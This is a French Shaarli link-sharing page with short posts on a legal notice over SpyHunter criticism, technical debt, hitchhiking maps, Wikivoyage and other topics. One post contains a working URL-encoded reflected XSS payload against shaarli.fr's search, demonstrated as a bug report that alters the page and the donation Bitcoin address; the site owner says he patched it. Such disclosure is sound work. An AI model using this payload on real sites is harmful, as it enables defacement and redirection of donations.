(Permalink)

(Permalink)

Pour changer du tour de France... impressionnant ce qu'il peut faire sur un vélo de course !

Nicolas Coolman a reçu une mise en demeure :
«A cet égard, notre cliente a pu constater et faire constater par constat d'huissier, la publication de propos dénigrants à son encontre ainsi qu'à l'encontre des produits et services qu'elle commercialise et notamment le logiciel SpyHunter.
[...]
Par conséquent, nous vous mettons en demeure par la présente lettre de procéder ou faire procéder au retrait des contenus litigieux susmentionnés ainsi que tout autre propos par lequel vous porteriez atteinte à l'image des produits et services de notre clientes, dans un délai de huit jours à compter de sa réception et de nous en justifier par écrit.»
La page concernée dans le cache Google :
http://webcache.googleusercontent.com/search?hl=fr&as_q=nicolascoolman.fr/spyhunter/&as_epq&as_oq&as_eq&as_nlo&as_nhi&lr&cr&as_qdr=all&as_sitesearch&as_occt&safe=images&as_filetype&as_rights&&ct=clnk&q=cache:YkLuxtPmqc8J:http://www.nicolascoolman.fr/crapware-spyhunter/%2Bnicolascoolman.fr/spyhunter/
(Permalink)

https://archive.is/wJT65
faisons marcher l'effet streisand
(Permalink)

Rââa©
Désolé!

Le lien est cassé une fois sur shaarli.fr. le voici cliquable:
{code
https://www.shaarli.fr/index.php?q=%22%3Cscript%3E%3Cscript%3Edocument.getElementsByTagName%28%22body%22%29[0].style.background=%27yellow%27;$%28%27h1.show-for-medium-up%27%29.html%28$%28%27h1.show-for-medium-up%27%29.html%28%29.replace%28/1EDwkGM6gCBn/,%27SALUT_C_NICO%E2%9D%A4%E2%9D%A4%27%29%29;%3C/script%3E%3C/script%3E%3Cp%20style=%27font-size:2em%27%3E%3Ch1%3E%E2%9D%A4Hacked%20by%20Nico_KraZhtest@%3Ca%20href=%27user23.net/links/?%27%3Euser23.net%3C/a%3E%3Cimg%20src=%27//i.imgur.com/PpIFlmW.gif%27/%3E%3C/h1%3E%3Ch4%3ELes%20failles%20XSS%20sont%20assez%20communes,%20%C3%A7a%20se%20joue%20%C3%A0%20tr%C3%A8s%20peu%20de%20choses!%3Cbr%3EC%27est%20le%20plus%20souvent%20rigolo!%3Cbr%3EDans%20certains%20cas%20comme%20ici%20sur%20shaarli.fr%20depuis%20peu,%20il%20y%20a%20une%20adresse%20Bitcoin,%20l%C3%A0-haut%20pour%20les%20dons^%3Cbr%3EDu%20javascript%20forc%C3%A9%20dans%20l%27url%20%28XSS,cross-scripting%29%20permet%20de%20changer%20les%20%C3%A9l%C3%A9ments%20%C3%A0%20la%20vol%C3%A9e.%3Cbr%3EComme%20sur%20cette%20page,%20les%20premiers%20caract%C3%A8res%20de%20l%27adresse%20Bitcoin%20sont%20remplac%C3%A9es%20par%20%22SALUT_C_NICO%E2%9D%A4%E2%9D%A4%22%3C/p%3EBien%20que%20ce%20soit%20un%20risque%20limit%C3%A9,%20un%20vilain%20pirate%20pourrait%20donc%20changer%20l%27adresse%20Bitcoin%20par%20url%20et%20encaisser%20tous%20les%20dons%20qui%20suivent%20ces%20liens.%3Cbr%3E%3Cbr%3EJ%27ai%20h%C3%A9sit%C3%A9%20%C3%A0%20publier%20ce%20message%20sous%20cette%20forme,%20bon%20voil%C3%A0,%20le%20risque%20est%20relativement%20limit%C3%A9.%20%20Un%20l%C3%A9ger%20petit%20probl%C3%A8me%20suppl%C3%A9mentaire%20pourrait%20laisser%20%C3%A9xecuter%20du%20code%20php%20dans%20l%27url,%20ce%20n%27est%20pas%20le%20cas%20ici%20directement.%20Pardon%20DM%20si%20cette%20forme%20de%20retour%20de%20bugs%20t%27etonnes%20un%20peu.%20%3Cbr%3E%3Cbr%3EShaarmicalement!%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%27%27%20Aller%20sinon%20cherche%20bon%20boulot%20dans%20le%20php/js/css/linux/s%C3%A9curit%C3%A9%28..%29%20r%C3%A9gion%20Grenobloise,%20ou%20pire.%20Oui,%20depuis%20une%20faille%20XSS!%20;%29%3Cbr%3EEventuellement,%20croisez%20la%20requ%C3%AAte!
code}

Screenshot: {pic http://i.imgur.com/jiS0m9v.png pic}
Firefox*

Merci pour la démo ! Je viens de corriger en urgence plusieurs entrées. Je pense qu'il y en a encore d'autres mais je dois faire un peu de déplacement de code pour le faire + proprement...

Sur le site web de ma boite, j'ai détecté une faille encore plus vicieuse car le paramètre de l'url est codé en base64 donc côté utilisateur, c'est encore moins évident de le détecter :p

NB : je te rassure, même en changeant l'adresse bitcoin, tu n'aurais pas été très riche !
(Permalink)

Je ne suis pas un pro du code, mais vous comprenez la même chose que moi ?!!
(Permalink)

TL;DW; ? Ce que je retiens:
"""
Avoid Technical Debt
* use a framework
* be open to new technologies
* unit tests
* loosely coupled code
* code reusability (modularize the code)
* reduce code complexity
* code reviews and feedback
* coding standards (promote good architecture)
* design patterns
* general best practices
* static code analysis
* continuous integration tools
* configuration management tools

Pay off Debt
* Make a plan
* Set goals
* Stay inside your budget
* Consistency
* Pay off some debt each sprint on regular interval
"""
(Permalink)

" Land confiscated from Palestinians for the purpose of security buffer zones around illegal Israeli settlements in the West Bank is actually being utilized as "land reserves or for agriculture," according to an investigation by Israeli newspaper Haaretz.

The buffer zones were originally created during the Second Intifada reportedly as a way to curb attacks against illegal Israeli settlements in the West Bank.

According to Israeli human rights group B'tselem, settlements control 42 percent of the land area in West Bank."
(Permalink)

pépites musicales..
EDIT: enfin pas tout. faut trier
(Permalink)

Wikitravel, en version anglaise, c'est pas loin d'être parfait.
Très réactif. Vraiment détaillé, il manque rarement quelque chose à propos d'une ville ou d'un endroit.
Un peu trop de recommandations et pas assez *undeground* certains diront sans torts.
En tout cas ça dépasse le guide du routard en qualité, précision et surtout en réactivité!

☀ via https://www.shaarli.fr/?q=id:f9b0006b0333b7e7dc323488a7e5c76e ;)

Petit précision : Wikitravel à été forké y'a pas mal de temps par la Wikimedia Fondation (Wikipedia etc.).
La version de Wikimedia s'appelle Wikivoyage.
Voir ici : https://www.wikivoyage.org/

Perso j'ai tendance à contribuer sur Wikivoyage
(pérennité du projet, pas de pub)
(Permalink)

Carte des "hotspots" à auto-stop en Europe et plus.
Efficace et bien détaillée! Zoomer pour faire apparaître les points.
Une api ouverte est disponible: http://hitchwiki.org/maps/about_api/

Carte mondiale pour faire du stop.

via : KraZhtest
(Permalink)

Un site collaborative qui vise à cartographier (et commenter) les points d'autostop dans le monde entier.
...
(via http://cochi.se/links/?CfDvSQ)
(Permalink)

(Permalink)

(Permalink)

Gopro lance une nouvelle caméra et comme d'habitude leur pub sont magnifiques (ou déprimante si on réalise comme notre vie est chiante et longue comparé à d'autres)...
(Permalink)

Grâce à ce lien :http://www.ascadia.net/links/?PIwmeg
(Permalink)

Je pense que le pire c'est pas tellement de ne pas être informé, c'est d'être mal informé.
(Permalink)

Apparemment, des photos non retouchées.
Le site est vraiment sympa et le boulot semble assez important.
(Permalink)

J’ai refait ma page 404 \o/
— (permalink)

nice
(Permalink)

(Permalink)

Des icônes/images dans le domaine public.
(Permalink)

(Permalink)